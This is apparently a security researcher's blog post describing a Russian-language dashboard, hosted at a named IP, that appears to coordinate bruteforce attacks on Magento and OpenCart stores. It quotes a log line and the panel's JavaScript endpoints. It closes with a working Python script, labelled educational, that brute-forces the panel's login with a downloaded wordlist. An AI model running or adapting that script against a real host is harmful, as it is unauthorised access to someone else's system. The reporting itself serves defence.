An OpenCart/Magento hacking dashboard


This post shows how sophisticated Magento hacking operations have become nowadays.

While investigating a bruteforced Magento store, I noticed that the hacker logged in using a curious referrer site:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/"

The site at http://194.87.232.147:777/ shows:

brute force dashboard

A “Magento report panel” asks for a Пароль (password). In the page source (beautified JS here) are some clues about its password protected functionality:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Apparently somebody has built a sophisticated dashboard to manage bruteforce Magento hacking operations. It appears to show the daily progress on hacked Magento stores and it has a GUI method to mark found servers as “success”. Also, it can be used to log in to the backend of hacked stores.

I checked my forensic notes of previous cases and found that this dashboard was used in at least one other case. Sysadmins, check your server logs.

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This signifies that e-commerce hackers are platform agnostic. If there’s money flowing through it, it’s worth hacking.

Returning the favour

What if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But in theory, you could use something like this (provided for educational purposes only):

#!/usr/bin/env python3
""" 
Brute force the admin password
of a Russian brute forcer's admin panel
"""

import requests
URL = 'http://194.87.232.147:777/Account/Login'

print("Downloading Russian wordlist...")
wordlist = requests.get('https://github.com/svetlitskiy/wordlist-russian/blob/master/russian-words.json?raw=true').json()

for word in wordlist:
	print("Trying {}".format(word.encode('utf-8')))
	resp = requests.post(URL, data=dict(Password=word))
	if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.content:
		print("{} looks good!".format(word.encode('utf-8')))
		break
Yours truly: security consultant & researcher, tracking payment skimmers since 2015. I am also the founder of the opensource malware scanner and Magereport. If you could use an extra pair of eyes in your team to resolve a complicated security issue, do get in touch.